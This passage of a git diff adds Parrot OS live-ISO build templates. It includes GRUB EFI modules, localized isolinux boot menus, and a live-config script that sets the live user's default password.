b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/testload.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/testspeed.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/testspeed.mod new file mode 100644 index 00000000..e0b44f08 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/testspeed.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/tftp.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/tftp.mod new file mode 100644 index 00000000..d63c608a Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/tftp.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/tga.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/tga.mod new file mode 100644 index 00000000..be0bbc6c Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/tga.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/time.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/time.mod new file mode 100644 index 00000000..64050471 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/time.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/tr.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/tr.mod new file mode 100644 index 00000000..fb511d05 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/tr.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/trig.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/trig.mod new file mode 100644 index 00000000..3b8a51c9 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/trig.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/true.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/true.mod new file mode 100644 index 00000000..253c5e2e Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/true.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/udf.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/udf.mod new file mode 100644 index 00000000..e8d96196 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/udf.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ufs1.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ufs1.mod new file mode 100644 index 00000000..ae9747a5 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ufs1.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ufs1_be.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ufs1_be.mod new file mode 100644 index 00000000..b3acc193 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ufs1_be.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ufs2.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ufs2.mod new file mode 100644 index 00000000..e3e6436b Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ufs2.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/uhci.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/uhci.mod new file mode 100644 index 00000000..30b30288 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/uhci.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/usb.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/usb.mod new file mode 100644 index 00000000..377497d8 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/usb.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/usb_keyboard.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/usb_keyboard.mod new file mode 100644 index 00000000..33380136 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/usb_keyboard.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/usbms.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/usbms.mod new file mode 100644 index 00000000..8287fef2 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/usbms.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/usbserial_common.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/usbserial_common.mod new file mode 100644 index 00000000..83203c29 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/usbserial_common.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/usbserial_ftdi.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/usbserial_ftdi.mod new file mode 100644 index 00000000..2fc43b18 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/usbserial_ftdi.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/usbserial_pl2303.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/usbserial_pl2303.mod new file mode 100644 index 00000000..a4aa4d22 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/usbserial_pl2303.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/usbserial_usbdebug.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/usbserial_usbdebug.mod new file mode 100644 index 00000000..9ef4513d Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/usbserial_usbdebug.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/usbtest.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/usbtest.mod new file mode 100644 index 00000000..5fb6b558 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/usbtest.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/verify.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/verify.mod new file mode 100644 index 00000000..e8a94ecc Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/verify.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/video.lst b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/video.lst new file mode 100644 index 00000000..ae9ba23e --- /dev/null +++ b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/video.lst @@ -0,0 +1,4 @@ +efi_gop +efi_uga +video_bochs +video_cirrus diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/video.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/video.mod new file mode 100644 index 00000000..9dda4ab6 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/video.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/video_bochs.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/video_bochs.mod new file mode 100644 index 00000000..f9b477b3 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/video_bochs.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/video_cirrus.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/video_cirrus.mod new file mode 100644 index 00000000..2388562c Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/video_cirrus.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/video_colors.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/video_colors.mod new file mode 100644 index 00000000..efe09cc3 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/video_colors.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/video_fb.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/video_fb.mod new file mode 100644 index 00000000..366fa39a Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/video_fb.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/videoinfo.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/videoinfo.mod new file mode 100644 index 00000000..308a2522 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/videoinfo.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/videotest.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/videotest.mod new file mode 100644 index 00000000..e3ee09d2 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/videotest.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/videotest_checksum.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/videotest_checksum.mod new file mode 100644 index 00000000..b4382b67 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/videotest_checksum.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/xfs.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/xfs.mod new file mode 100644 index 00000000..51642227 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/xfs.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/xnu.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/xnu.mod new file mode 100644 index 00000000..d8833b98 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/xnu.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/xnu_uuid.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/xnu_uuid.mod new file mode 100644 index 00000000..5ad6dc48 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/xnu_uuid.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/xnu_uuid_test.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/xnu_uuid_test.mod new file mode 100644 index 00000000..207c5244 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/xnu_uuid_test.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/xzio.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/xzio.mod new file mode 100644 index 00000000..fef83d54 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/xzio.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/zfscrypt.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/zfscrypt.mod new file mode 100644 index 00000000..25aff7de Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/zfscrypt.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/efi/boot/bootia32.efi b/modules/parrot-build/templates/common/includes.binary/efi/boot/bootia32.efi new file mode 100644 index 00000000..3246b8ec Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/efi/boot/bootia32.efi differ diff --git a/modules/parrot-build/templates/common/includes.binary/efi/boot/bootx64.efi b/modules/parrot-build/templates/common/includes.binary/efi/boot/bootx64.efi new file mode 100644 index 00000000..32982635 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/efi/boot/bootx64.efi differ diff --git a/modules/parrot-build/templates/common/includes.binary/isolinux/advanced.cfg b/modules/parrot-build/templates/common/includes.binary/isolinux/advanced.cfg new file mode 100644 index 00000000..7a329705 --- /dev/null +++ b/modules/parrot-build/templates/common/includes.binary/isolinux/advanced.cfg @@ -0,0 +1,8 @@ +label hdt + menu label ^Hardware Detection Tool (HDT) + com32 /isolinux/hdt.c32 + + menu label Load system to RAM + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot quiet splash toram diff --git a/modules/parrot-build/templates/common/includes.binary/isolinux/install.cfg b/modules/parrot-build/templates/common/includes.binary/isolinux/install.cfg new file mode 100644 index 00000000..6db08734 --- /dev/null +++ b/modules/parrot-build/templates/common/includes.binary/isolinux/install.cfg @@ -0,0 +1,26 @@ +menu begin install + menu title Install + include stdmenu.cfg + label mainmenu + menu label ^Back.. + menu exit + + label install + menu label Standard Installer + linux /install/vmlinuz + initrd /install/initrd.gz + append hostname=parrot pci=nommconf ide=nodma vga=788 -- quiet + + label installgui + menu label Install with GTK GUI + linux /install/gtk/vmlinuz + initrd /install/gtk/initrd.gz + append hostname=parrot video=vesa:ywrap,mtrr pci=nommconf ide=nodma vga=788 -- quiet + + label installspk + menu label Install with speech synthesys + linux /install/gtk/vmlinuz + initrd /install/gtk/initrd.gz + append video=vesa:ywrap,mtrr vga=788 speakup.synth=soft -- quiet + +menu end diff --git a/modules/parrot-build/templates/common/includes.binary/isolinux/isolinux.cfg b/modules/parrot-build/templates/common/includes.binary/isolinux/isolinux.cfg new file mode 100644 index 00000000..92c9e701 --- /dev/null +++ b/modules/parrot-build/templates/common/includes.binary/isolinux/isolinux.cfg @@ -0,0 +1,4 @@ +include menu.cfg +default vesamenu.c32 +prompt 0 +timeout 300 diff --git a/modules/parrot-build/templates/common/includes.binary/isolinux/live.cfg b/modules/parrot-build/templates/common/includes.binary/isolinux/live.cfg new file mode 100644 index 00000000..f84a457b --- /dev/null +++ b/modules/parrot-build/templates/common/includes.binary/isolinux/live.cfg @@ -0,0 +1,54 @@ +label ^live + menu label ^Live Mode + menu default + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot locales=en_US.UTF-8 keyboard-layouts=us quiet splash apparmor=0 + +label text + menu label Terminal mode + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot locales=en_US.UTF-8 keyboard-layouts=en quiet splash systemd.unit=multi-user.target apparmor=0 + +label toram + menu label RAM mode + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot quiet splash toram apparmor=0 + +label Persistence + menu label Persistence + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot locales=en_US.UTF-8 keyboard-layouts=en quiet persistence apparmor=0 + +label live-encrypted-persistence + menu label Encrypted Persistence + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live persistent=cryptsetup persistence-encryption=luks hostname=parrot locales=en_US.UTF-8 keyboard-layouts=en quiet persistence apparmor=0 + +label Forensic + menu label Forensics + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot locales=en_US.UTF-8 keyboard-layouts=en noswap noautomount apparmor=0 + +label Failsafe Nomodeset + menu label Failsafe (nomodeset) + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot locales=en_US.UTF-8 keyboard-layouts=en nomodeset apparmor=0 + +label Failsafe gpu + menu label Failsafe (disable nvidia/amd gpu) + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot locales=en_US.UTF-8 keyboard-layouts=en modprobe.blacklist=nouveau,nvidia,radeon,drm apparmor=0 + +label Failsafe2 + menu label Failsafe (prevent errors) + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live config memtest noapic noapm nodma nomce nolapic nomodeset nosmp nosplash vga=normal hostname=parrot locales=en_US.UTF-8 keyboard-layouts=en apparmor=0 diff --git a/modules/parrot-build/templates/common/includes.binary/isolinux/live.de.cfg b/modules/parrot-build/templates/common/includes.binary/isolinux/live.de.cfg new file mode 100644 index 00000000..5c0c3108 --- /dev/null +++ b/modules/parrot-build/templates/common/includes.binary/isolinux/live.de.cfg @@ -0,0 +1,59 @@ + include stdmenu.cfg + label mainmenu + menu label ^Back.. + menu exit + + label ^live + menu label ^Live + menu default + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot locales=de_DE.UTF-8 keyboard-layouts=de pkeys=de setxkbmap=de quiet splash apparmor=0 + + label Terminal + menu label Terminal mode + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot locales=de_DE.UTF-8 keyboard-layouts=de pkeys=de setxkbmap=de quiet splash systemd.unit=multi-user.target apparmor=0 + + label toram + menu label RAM mode + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot locales=de_DE.UTF-8 keyboard-layouts=de pkeys=de setxkbmap=de quiet splash toram apparmor=0 + + label Persistence + menu label Live with persistence + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot locales=de_DE.UTF-8 keyboard-layouts=de pkeys=de setxkbmap=de quiet persistence apparmor=0 + + label live-encrypted-persistence + menu label Live with Encrypted persistence + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live persistent=cryptsetup persistence-encryption=luks hostname=parrot locales=de_DE.UTF-8 keyboard-layouts=de pkeys=de setxkbmap=de quiet persistence apparmor=0 + + label Forensics + menu label Forensics + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot noswap noautomount locales=de_DE.UTF-8 keyboard-layouts=de pkeys=de setxkbmap=de apparmor=0 + + label Failsafe Nomodeset + menu label Failsafe (Nomodeset) + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot locales=de_DE.UTF-8 keyboard-layouts=de pkeys=de setxkbmap=de nomodeset apparmor=0 + + label Failsafe gpu + menu label Failsafe (disable nvidia/amd gpu) + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot locales=de_DE.UTF-8 keyboard-layouts=de pkeys=de setxkbmap=de modprobe.blacklist=nouveau,nvidia,radeon,drm apparmor=0 + + label Failsafe2 + menu label Failsafe (prevent errors) + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live config memtest noapic noapm nodma nomce nolapic nomodeset nosmp nosplash vga=normal hostname=parrot locales=de_DE.UTF-8 keyboard-layouts=de pkeys=de setxkbmap=de apparmor=0 diff --git a/modules/parrot-build/templates/common/includes.binary/isolinux/live.es.cfg b/modules/parrot-build/templates/common/includes.binary/isolinux/live.es.cfg new file mode 100644 index 00000000..10113489 --- /dev/null +++ b/modules/parrot-build/templates/common/includes.binary/isolinux/live.es.cfg @@ -0,0 +1,59 @@ + include stdmenu.cfg + label mainmenu + menu label ^Back.. + menu exit + + label ^live + menu label ^Modalidad Live + menu default + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot locales=es_ES.UTF-8 keyboard-layouts=es pkeys=es setxkbmap=es quiet splash apparmor=0 + + label text + menu label Terminal + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot locales=es_ES.UTF-8 keyboard-layouts=es pkeys=es setxkbmap=es quiet splash systemd.unit=multi-user.target apparmor=0 + + label toram + menu label RAM mode + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot locales=es_ES.UTF-8 keyboard-layouts=es pkeys=es setxkbmap=es quiet splash toram apparmor=0 + + label Persistence + menu label Moda'lidad Persistente (para establecer previamente) + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot locales=es_ES.UTF-8 keyboard-layouts=es pkeys=es setxkbmap=es quiet persistence apparmor=0 + + label live-encrypted-persistence + menu label Moda'lidad Persistente Cifrada (para establecer previamente) + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live persistent=cryptsetup persistence-encryption=luks hostname=parrot locales=es_ES.UTF-8 keyboard-layouts=es pkeys=es setxkbmap=es quiet persistence apparmor=0 + + label Forensic + menu label Ana'lisis Forense (moda'lidad forense no invasiva) + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot noswap noautomount locales=es_ES.UTF-8 keyboard-layouts=es pkeys=es setxkbmap=es apparmor=0 + + label Failsafe Nomodeset + menu label Moda'lidad Segura Nomodeset (por los errores de tarjeta de vi'deo) + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot locales=es_ES.UTF-8 keyboard-layouts=es pkeys=es setxkbmap=es nomodeset apparmor=0 + + label Failsafe gpu + menu label Moda'lidad Segura Nomodeset (por los errores de gpu nvidia/amd) + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot locales=es_ES.UTF-8 keyboard-layouts=es pkeys=es setxkbmap=es modprobe.blacklist=nouveau,nvidia,radeon,drm apparmor=0 + + label Failsafe2 + menu label Moda'lidad Segura avanzada (prevencio'n de errores) + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live config memtest noapic noapm nodma nomce nolapic nomodeset nosmp nosplash vga=normal hostname=parrot locales=es_ES.UTF-8 keyboard-layouts=es pkeys=es setxkbmap=es apparmor=0 diff --git a/modules/parrot-build/templates/common/includes.binary/isolinux/live.fr.cfg b/modules/parrot-build/templates/common/includes.binary/isolinux/live.fr.cfg new file mode 100644 index 00000000..85fb5265 --- /dev/null +++ b/modules/parrot-build/templates/common/includes.binary/isolinux/live.fr.cfg @@ -0,0 +1,59 @@ + include stdmenu.cfg + label mainmenu + menu label ^Back.. + menu exit + + label ^live + menu label ^Live Mode + menu default + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot locales=fr_FR.UTF-8 keyboard-layouts=fr pkeys=fr setxkbmap=fr quiet splash apparmor=0 + + label text + menu label Termianl Mode + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot locales=fr_FR.UTF-8 keyboard-layouts=fr pkeys=fr setxkbmap=fr quiet splash systemd.unit=multi-user.target apparmor=0 + + label toram + menu label RAM mode + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot locales=fr_FR.UTF-8 keyboard-layouts=fr pkeys=fr setxkbmap=fr quiet splash toram apparmor=0 + + label Persistence + menu label Live with persistence (configure it before) + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot locales=fr_FR.UTF-8 keyboard-layouts=fr pkeys=fr setxkbmap=fr quiet persistence apparmor=0 + + label live-encrypted-persistence + menu label Live with Encrypted persistence (configure it before) + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live persistent=cryptsetup persistence-encryption=luks hostname=parrot locales=fr_FR.UTF-8 keyboard-layouts=fr pkeys=fr setxkbmap=fr quiet persistence apparmor=0 + + label Forensic + menu label Forensic (Non-invasive forensic mode) + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot noswap noautomount locales=fr_FR.UTF-8 keyboard-layouts=fr pkeys=fr setxkbmap=fr apparmor=0 + + label Failsafe Nomodeset + menu label Failsafe Nomodeset (for simple GPU errors) + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot locales=fr_FR.UTF-8 keyboard-layouts=fr pkeys=fr setxkbmap=fr nomodeset apparmor=0 + + label Failsafe gpu + menu label Failsafe Nomodeset (disable nvidia/amd gpu) + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot locales=fr_FR.UTF-8 keyboard-layouts=fr pkeys=fr setxkbmap=fr modprobe.blacklist=nouveau,nvidia,radeon,drm apparmor=0 + + label Failsafe2 + menu label Failsafe Extreme (prevent errors) + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live config memtest noapic noapm nodma nomce nolapic nomodeset nosmp nosplash vga=normal hostname=parrot locales=fr_FR.UTF-8 keyboard-layouts=fr pkeys=fr setxkbmap=fr apparmor=0 diff --git a/modules/parrot-build/templates/common/includes.binary/isolinux/live.it.cfg b/modules/parrot-build/templates/common/includes.binary/isolinux/live.it.cfg new file mode 100644 index 00000000..756621b6 --- /dev/null +++ b/modules/parrot-build/templates/common/includes.binary/isolinux/live.it.cfg @@ -0,0 +1,59 @@ + include stdmenu.cfg + label mainmenu + menu label ^Back.. + menu exit + + label ^live + menu label ^Modalita' live + menu default + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot locales=it_IT.UTF-8 keyboard-layouts=it pkeys=it setxkbmap=it quiet splash apparmor=0 + + label text + menu label ^Modalita' Terminale + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot locales=it_IT.UTF-8 keyboard-layouts=it pkeys=it setxkbmap=it quiet splash systemd.unit=multi-user.target apparmor=0 + + label toram + menu label RAM mode + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot locales=it_IT.UTF-8 keyboard-layouts=it pkeys=it setxkbmap=it quiet splash toram apparmor=0 + + label Persistence + menu label Persistenza + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot locales=it_IT.UTF-8 keyboard-layouts=it pkeys=it setxkbmap=it quiet persistence apparmor=0 + + label live-encrypted-persistence + menu label Persistenza Criptata + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live persistent=cryptsetup persistence-encryption=luks hostname=parrot locales=it_IT.UTF-8 keyboard-layouts=it pkeys=it setxkbmap=it quiet persistence apparmor=0 + + label Forensics + menu label Analisi Forense + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot noswap noautomount locales=it_IT.UTF-8 keyboard-layouts=it pkeys=it setxkbmap=it apparmor=0 + + label Failsafe Nomodeset + menu label Modalita' Sicura (nomodeset) + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot locales=it_IT.UTF-8 keyboard-layouts=it pkeys=it setxkbmap=it nomodeset apparmor=0 + + label Failsafe gpu + menu label Modalita' Sicura (disabilita gpu nvidia/amd) + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live hostname=parrot locales=it_IT.UTF-8 keyboard-layouts=it pkeys=it setxkbmap=it modprobe.blacklist=nouveau,nvidia,radeon,drm apparmor=0 + + label Failsafe2 + menu label Modalita' Sicura Avanzata (prevenzione errori) + linux /live/vmlinuz + initrd /live/initrd.img + append boot=live config memtest noapic noapm nodma nomce nolapic nomodeset nosmp nosplash vga=normal hostname=parrot locales=it_IT.UTF-8 keyboard-layouts=it pkeys=it setxkbmap=it apparmor=0 diff --git a/modules/parrot-build/templates/common/includes.binary/isolinux/menu.cfg b/modules/parrot-build/templates/common/includes.binary/isolinux/menu.cfg new file mode 100644 index 00000000..49a21af7 --- /dev/null +++ b/modules/parrot-build/templates/common/includes.binary/isolinux/menu.cfg @@ -0,0 +1,35 @@ +menu hshift 0 +menu width 82 + +menu title ISO_TITLE - ISO_VERSION ISO_ARCH +include stdmenu.cfg +include live.cfg +label .. +menu begin italian + menu title Italiano + include live.it.cfg +menu end +menu begin spanish + menu title Espanol + include live.es.cfg +menu end +menu begin german + menu title Deutsch + include live.de.cfg +menu end +menu begin french + menu title Francais + include live.fr.cfg +menu end +label .. +include install.cfg +menu begin advanced + menu title Advanced options + include stdmenu.cfg + label mainmenu + menu label ^Back.. + menu exit + include advanced.cfg +menu end + +menu clear diff --git a/modules/parrot-build/templates/common/includes.binary/isolinux/splash.png b/modules/parrot-build/templates/common/includes.binary/isolinux/splash.png new file mode 100644 index 00000000..7a2e7414 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/isolinux/splash.png differ diff --git a/modules/parrot-build/templates/common/includes.binary/isolinux/stdmenu.cfg b/modules/parrot-build/templates/common/includes.binary/isolinux/stdmenu.cfg new file mode 100644 index 00000000..329c5d31 --- /dev/null +++ b/modules/parrot-build/templates/common/includes.binary/isolinux/stdmenu.cfg @@ -0,0 +1,14 @@ +menu background splash.png +menu color title * #3AAEFBff * +menu color border * #00000000 #00000000 none +menu color sel * #ffffffff #76a1d0ff * +menu color hotsel 1;7;37;40 #ffffffff #76a1d0ff * +menu color tabmsg * #46ADDDff #00000000 * +menu color help 37;40 #ffddddaa #00000000 none +menu vshift 4 +menu rows 21 +menu tabmsg ENTER (boot) - TAB (edit) - Arrows (select) +# The command line must be at least one line from the bottom. +menu cmdlinerow 21 +menu timeoutrow 22 +menu tabmsgrow 30 diff --git a/modules/parrot-build/templates/common/includes.chroot/etc/resolv.conf b/modules/parrot-build/templates/common/includes.chroot/etc/resolv.conf new file mode 120000 index 00000000..ae228ef7 --- /dev/null +++ b/modules/parrot-build/templates/common/includes.chroot/etc/resolv.conf @@ -0,0 +1 @@ +/etc/resolvconf/run/resolv.conf \ No newline at end of file diff --git a/modules/parrot-build/templates/common/includes.chroot/lib/live/config/0031-user-password b/modules/parrot-build/templates/common/includes.chroot/lib/live/config/0031-user-password new file mode 100755 index 00000000..374a8dd6 --- /dev/null +++ b/modules/parrot-build/templates/common/includes.chroot/lib/live/config/0031-user-password @@ -0,0 +1,5 @@ +#!/bin/sh + +# Set "toor" as user password +usermod -p 'X014elvznJq7E' user + diff --git a/modules/parrot-build/templates/common/includes.chroot/root/.config/bleachbit/bleachbit.ini b/modules/parrot-build/templates/common/includes.chroot/root/.config/bleachbit/bleachbit.ini new file mode 100755 index 00000000..2a97f29b --- /dev/null +++ 